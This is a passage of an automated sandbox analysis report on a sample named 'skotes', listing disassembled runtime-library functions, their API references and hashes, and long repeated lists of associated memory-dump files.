Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
String ID: e
API String ID: 1411586358-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: ec5ff350768dc844aa29ab6555de6ae8aad9d780c0d90f4d3e4aad8eae053a77
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: 5011A333618105ABDB15DF69C8817AA73A8FF41328B54C55AFC0E9F202DB75D901CBA1

Function 0095D029 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

___scrt_fastfail.LIBCMT ref: 0095D0A5

Strings

SleepConditionVariableCS, xrefs: 0095D05D
WakeAllConditionVariable, xrefs: 0095D069
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0095D03B
kernel32.dll, xrefs: 0095D04C

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: ___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2964418898-3242537097
Opcode ID: cf3bc6b32e8de67d261eb3797e710a2d1b377d8afb643eb87d290c623a471231
Instruction ID: 8e69733836e87d15aba608bb539c7d120faa989e7b0f79b893d86e0a9aec6c57
Opcode Fuzzy Hash: cf3bc6b32e8de67d261eb3797e710a2d1b377d8afb643eb87d290c623a471231
Instruction Fuzzy Hash: 11018F61B87712AEBA31AA766C01E6B31DC9F83B49F061111AC00F22D0DE60DD0756A5

Function 00984C14 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00984C98
__alloca_probe_16.LIBCMT ref: 00984D5E
__freea.LIBCMT ref: 00984DCA

Part of subcall function 0097B04B: RtlAllocateHeap.NTDLL(00000000,9CBA457E,?,?,0095D3FC,9CBA457E,?,00957A8B,?,?,?,?,?,?,00947465,?), ref: 0097B07D

__freea.LIBCMT ref: 00984DD3
__freea.LIBCMT ref: 00984DF6

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 29461dab781c7be36d4dbe7f0fb352a2b485b475f8d0dac41fb3dfbcc5a25137
Instruction ID: 2a499e8311a6dc4a426e6e925e430918960bf03baad280a0b175b8cb3e448cdd
Opcode Fuzzy Hash: 29461dab781c7be36d4dbe7f0fb352a2b485b475f8d0dac41fb3dfbcc5a25137
Instruction Fuzzy Hash: BF51A072600217ABEB25AF649C41FBB3AADDF85754F154529FD08A7381EB34EC1097A0

Function 0096E8DD Relevance: 7.6, APIs: 5, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 0096E91E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0096E926
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0096E950
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0096E959
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0096E9DC

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
String ID:
API String ID: 512098550-0
Opcode ID: c82a19a07c0ed05ca48ca8e2e1815043f73229ebe7d72c786f8ca435f087dbe6
Instruction ID: 928cd05a4fd40fcd27db253f1492afddb4b410bd611f03bcd7d0e72a738d05fd
Opcode Fuzzy Hash: c82a19a07c0ed05ca48ca8e2e1815043f73229ebe7d72c786f8ca435f087dbe6
Instruction Fuzzy Hash: 1D416F79A00619EFCF09DF68C554AADB7B6FF88310F048159E956AB390CB74AE01DF81

Function 0095ECE6 Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0095ECED
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0095ED17

Part of subcall function 0095F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0095F3FA

__alloca_probe_16.LIBCMT ref: 0095ED53
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0095ED94
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0095EDC6

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16
String ID:
API String ID: 2568206803-0
Opcode ID: 90562fa0ed5e09182308cec38812ae3b96237377d17c24c6f06f06e20e7db4b1
Instruction ID: abefd2146ea9fbe1db0f994f2c223567051c189de2c2ef28b76bf66658baf618
Opcode Fuzzy Hash: 90562fa0ed5e09182308cec38812ae3b96237377d17c24c6f06f06e20e7db4b1
Instruction Fuzzy Hash: AE31B271A002158FCB19DFA9C8416ADB7F9EF49351F24406EEC45E7390DB359E0ACB94

Function 0096D2B9 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0096D344
ListArray.LIBCONCRT ref: 0096D367
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0096D370
ListArray.LIBCONCRT ref: 0096D3A8
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0096D3B3

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
